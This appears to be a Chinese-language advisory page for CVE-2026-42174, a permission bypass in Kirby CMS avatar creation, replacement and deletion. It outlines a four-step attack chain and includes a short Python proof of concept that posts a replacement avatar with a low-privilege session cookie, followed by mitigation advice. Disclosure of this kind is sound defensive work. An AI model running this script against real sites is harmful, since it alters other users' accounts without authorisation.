CVE-2026-42174 CVSS 4.3 中危

CVE-2026-42174 Kirby CMS权限绕过漏洞

披露日期: 2026-05-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42174

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kirby CMS

漏洞概述

Kirby CMS在4.9.0和5.4.0版本之前存在权限绕过漏洞。由于用户头像的创建、替换和删除操作未受到用户更新权限的正确限制，低权限用户可以未经授权修改头像。该漏洞可能导致用户信息完整性受损，已在4.9.0和5.4.0版本中修复。

技术细节

该漏洞的核心在于Kirby CMS在用户头像管理模块中存在访问控制缺失。在4.9.0和5.4.0版本之前，系统未对涉及用户头像的创建、替换和删除操作实施基于权限的严格验证。具体而言，后端接口在处理这些请求时，仅检查了用户的基础登录状态，而未核实用户是否具备“更新该用户资料”的特定权限。这使得经过身份认证的低权限攻击者能够通过构造特定的网络请求，绕过权限限制，直接修改其他用户的头像。由于攻击无需用户交互，攻击者可批量利用此漏洞。虽然该漏洞未导致敏感信息泄露或服务中断，但其破坏了用户数据的完整性，可能造成身份混淆等安全风险。

攻击链分析

STEP 1

侦察

攻击者识别目标系统使用的是存在漏洞的Kirby CMS版本（4.9.0或5.4.0之前）。

STEP 2

获取权限

攻击者注册或通过其他方式获取一个低权限的合法用户账户。

STEP 3

漏洞利用

攻击者使用该低权限账户的凭证，向后台发送特制的HTTP请求（如POST/PUT），试图修改管理员或其他用户的头像。

STEP 4

达成效果

由于系统未校验更新权限，头像被成功替换，导致用户数据完整性被破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-kirby-site.com/panel/users/{user_id}/avatar"
attacker_cookie = "low_privilege_session_cookie_value"

# Headers and Cookies
headers = {
    "User-Agent": "Mozilla/5.0 (PoC Analyst)"
}
cookies = {
    "kirby_session": attacker_cookie
}

# Payload: New avatar file
files = {
    "avatar": ("exploit.jpg", open("exploit.jpg", "rb"), "image/jpeg")
}

# Send exploit request
try:
    response = requests.post(target_url, headers=headers, cookies=cookies, files=files)
    if response.status_code == 200:
        print("[+] PoC Success: Avatar updated potentially.")
    else:
        print(f"[-] PoC Failed: Status code {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

影响范围

Kirby < 4.9.0

Kirby < 5.4.0

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用用户头像上传功能，或通过后端代码逻辑临时添加权限校验中间件，确保只有拥有用户更新权限的用户才能操作头像。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表